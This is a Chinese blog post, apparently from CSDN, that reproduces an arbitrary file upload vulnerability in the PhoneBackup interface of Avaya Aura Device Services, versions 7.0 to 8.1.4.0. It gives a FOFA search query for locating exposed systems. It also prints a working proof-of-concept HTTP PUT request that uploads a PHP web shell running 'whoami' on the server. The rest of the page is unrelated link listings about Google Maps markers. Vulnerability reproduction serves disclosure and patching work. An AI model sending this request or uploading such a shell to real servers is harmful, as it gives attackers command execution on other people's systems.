Avaya Aura Device Services 任意文件上传漏洞复现

0xSecl

已于 2023-12-06 21:14:36 修改

阅读量1.3k

点赞数 12

分类专栏：漏洞复现v1 文章标签：安全 web安全

于 2023-12-06 19:02:19 首次发布

本文链接：https://blog.youkuaiyun.com/qq_41904294/article/details/134838662

版权

漏洞复现v1 专栏收录该内容

997 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了Avaya Aura Device Services的任意文件上传漏洞，该漏洞存在于PhoneBackup接口，允许攻击者绕过验证，影响7.0至8.1.4.0版本。通过POC演示了复现过程，并提供了厂商的修复补丁链接。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

Avaya Aura Device Services是美国Avaya公司的一个应用软件。提供一个管理 Avaya 端点功能。

0x02 漏洞概述

Avaya Aura Device Services 系统PhoneBackup接口处存在任意文件上传漏洞，攻击者可绕过验证上传任意文件获取服务器权限。

0x03 影响范围

Avaya Aura Device Services 7.0-8.1.4.0版本

0x04 复现环境

FOFA：app="AVAYA-Aura-Utility-Server"

0x05 漏洞复现

PoC

PUT /PhoneBackup/123.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: AVAYA
Content-Length: 23

<?php system('whoami');

PS：简单粗暴，直接put上传

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

12
点赞
踩
11

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

Google Maps API：自定义Marker图标，为图标添加文字等信息

youthpasses的专栏

06-30

6485

代码： <script src="http://ditu.google.com/maps?file=api&v=2&key=ABQIAAAAzr2EBOXUKnm_jVnk0OJI7xSosDVG8KKPE1-m51RBrvYughuyMxQ-i1QfUnH94QxWIa6N4U6MouMmBA&hl=zh-CN"

2 条评论您还未登录，请先登录后发表或查看评论

Google API V3自定义图标或信息框

phpzealer的专栏

03-18

3009

最近做了一个*牛的国际酒店PC端列表页和地图找酒店页，两个页面需要用到Google Map API V3地图插件。其中花了比较多的时间的有两个地方，包括自定义图标和自定义信息框，这里将我的经验分享一下。因为是第一次用，所以写的有问题的地方请指出。一、自定义图标最终结果的展示：主要功能是在列表页加载完成后获取列表中所有酒店的经纬度等信息，在地图上展示出来。并且对所有的图标marker进行点击事件绑定

Google Map Api v3 自定义标记插件RichMarker

Caco 的博客

09-29

1528

Google Map Api v3 自定义标记插件RichMarker

谷歌地图marker自定义svg图标，使用本地图片方法

qq_33256701的博客

12-26

1401

找了一圈官网是要自定义svg的path，但是图标是两个path的svg，刚开始使用combine marker，效果有点卡，而且在聚合的时候两个marker没有combine成功，要么使用线上路径。最后，在查看cluster的部分找到示例。

google地图marker添加div提示信息

天马波波的专栏

10-09

3367

http://www.w3.org/1999/xhtml" > 地图 http://ditu.google.cn/maps/api/js?sensor=true&language=zh">> var map; NameOverlay.prototype = new google.maps.Overlay

Google map 中 Marker 使用自定义图标

weixin_30908649的博客

07-09

707

因为在项目中要在 google 地图上显示车辆图标, 并且用图标车头的指向来表示当前车辆的方位 , 因此不能使用google map中提供的图标, 必须使用自定义的车辆图标. (1) 准备图标档: Marker 图标必须为 .png 透明格式档; 将360度划分为16个方位, 即从正北, 北偏东, 东北, 东偏北, 正东, .. 顺时针方向到北偏西. 在 photoshop 平面图像处理...

GoogleMapsMarkerClustering:如何在 Google 地图中使用标记聚类实用程序的示例

06-01

在本文中，我们将深入探讨如何在Google地图API中利用Java实现标记聚类，这是一个非常重要的技术，特别是当你需要在地图上展示大量数据点时。"GoogleMapsMarkerClustering"项目提供了一个示例，展示了如何优雅地处理...

【实践教程】：一步步教你构建性能卓越的Google Map API离线地图应用

[【实践教程】：一步步教你构建性能卓越的Google Map API离线地图应用](https://storage.googleapis.com/support-forums-api/attachment/message-9174238-13507265983256111946.PNG) # 摘要随着移动和网络技术的...

vue中使用google地图（自定义label、信息窗口）

热门推荐

Dreamer_xr的博客

12-06

1万+

最近公司爱尔兰项目需要使用google地图，项目还是用vue写的，那我就寻思找个vue能用的google地图的插件吧，找了vue2-google-maps，这个插件确实还行，而且github上还有api文档，虽然都是英文很难受，但是还行，没有骚需求的话，用它还行。 google地图里面有个功能，label，vue2-google-maps里面是没有办法控制label的位置的，默...

M_Map用户向导1.4中文版：自定义地图元素与数据集成的5大技巧

本文旨在介绍M_Map用户向导中文版的全面概览，探讨自定义地图元素的理论基础和设计原则，并详细阐述地图元素的定制过程。文章还深入分析了数据集成的核心策略，包括数据类型、来源、处理转换方法，以及数据集成的...

谷歌地图-----添加文本标注

峰羽

01-07

1673

由于谷歌地图没有直接的类似百度地图API中的BMap.Label()方法 var label = new google.maps.Marker({ label: { color: "#FFF", //文本颜色 fontSize: "14px", //文本字体大小...

google地图--自定义标记以及点击事件

w_shuhua的博客

08-25

7550

最近看到朋友正在用谷歌地图做定位项目，看到地图实现的效果比较炫酷，很是喜欢，就模仿学习其中常用的一些效果。我们经常写的就是定位系统。点击marker标记弹出框。但是谷歌地图弹出的框可能和我们的设计图不符合，这时候我们就要认为修改设计图来实现效果。 1.谷歌地图的基本使用实现效果代码如下： <!doctype html> <html> <hea...

google map使用自定义Marker在地图上添加文字标示

03-21

1941

google map默认的标示GMarker，只能使用图片不能使用文字。但是在实际中，我们不可避免的需要在地图上标示文字信息。例如地名等。Google 地图 API 使我们可以通过扩展GMarker实现自定义的GMarker的子类LabelMarker。 1 google.maps.LabelMarker = function(latlng, options) 2 { 3

google 地图初始化maker 显示label，title不能自动显示，使用label解决

此去经年

05-09

2161

Google map中自定义label和icon的解决方案

hintcnuie

04-17

970

在Google Flash API for map的当前版本（1.9)中，是不支持同时使用自定义label和自定义icon的，但是项目中又必须同时使用这两个东西，为什么google earth和google earth plugin中可以显示呢？苦思多日不得解，今天突发奇想，如果api不提供，就用一个山寨点的方法呗。具体问题是这样的： google中无法同时显示...

谷歌地图 API 开发之添加标记（解析以及补充）

weixin_34352005的博客

09-07

470

今天又看了下官网，发现官网上有地图标记的详细说明。当时居然眼瞎看不见，还琢磨了好久...#$%^&，一定是项目太急，没看到(^o^)/~地址：https://developers.google.com... 添加标记 google.maps.Marker 的构造函数只需传入一个 MarkerOptions 对象字面量，用于指定标记的初始属性。以下字段特别重要，并且在构建标记时通常会进行设...

google map api v3 的marker使用label的方法(markerwithlabel的使用)

daizi_xiao的专栏

07-14

8455

在google v3里面取消了marker的label方法，所以

谷歌地图API 显示地图添加maker点，信息窗体及事件

longchenghui20的专栏

07-15

4625

引入秘钥为GoogleMaps设置宽高样式 var maps = new google.maps.Map(document.getElementById("GoogleMaps"),{ center:new google.maps.LatLng(39.915,116.404), disableDefaultUI:false,//设置为true,禁

google地图上固定的点添加marker标记

我们都在成长

04-27

8529

官方参考地址：https://developers.google.com/maps/documentation/javascript/reference?hl=zh-cn 首先我们使用script标记加入Maps API JavaScript：注意此处的，如果不指定true或false浏览器会不支持。然后我们以标注北京为例来设置一下地图：将地图的中心点

使用PHP和Ajax构建Google Maps应用基础教程

"本资源是一本关于Google Map API的基础教程，旨在帮助初学者掌握如何使用Google Map API创建自己的地图应用，内容深入浅出，适合新手入门。教程涵盖了API Version 2，包括Google的地理编码器功能。" 在Web开发领域...